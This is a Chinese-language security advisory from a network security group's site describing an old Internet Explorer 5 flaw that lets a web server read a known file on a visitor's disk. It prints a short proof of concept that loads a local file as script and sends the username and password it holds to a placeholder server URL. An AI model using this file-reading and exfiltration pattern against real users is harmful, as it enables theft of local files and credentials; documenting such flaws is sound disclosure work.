您当前的位置 >> 首页     

服务器利用 IE 5 漏洞读取客户机上文件

/ns/ld/softld/data/20010613024053.htm

涉及程序:
IE5

描述:
服务器利用 IE 5 漏洞读取客户机上文件
近日发现 IE5 存在漏洞,利用此漏洞,服务器能读取客户机上的文件。
假设客户机的 'C:\WINNT' 目录下有 'test.txt' 文件,其内容为:
us="stefaan"
passwd="mypasswd"

那么可利用以下代码读取该文件:
<script src=" <file:///C:/WINNT/test.txt>
file:///C:/WINNT/test.txt"></script>

HTML 页面将会认为这个文件是一个脚本,而 us,passwd 是变量

然后,便可将此信息发回服务器:
<script>
//alert(passwd)
window.open(" <http://myurl/myasppage.asp?us>
http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" + escape(passwd),
"blabla")
</script>

注意:此种攻击需已知文件名

关于我们 | 加入我们 | 网站结构 | 交换连接 | 联系我们

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Network Security Group.
All Rights Reserved.
W3C XHTML 1.0 Strict & CSS 1.2 Valid.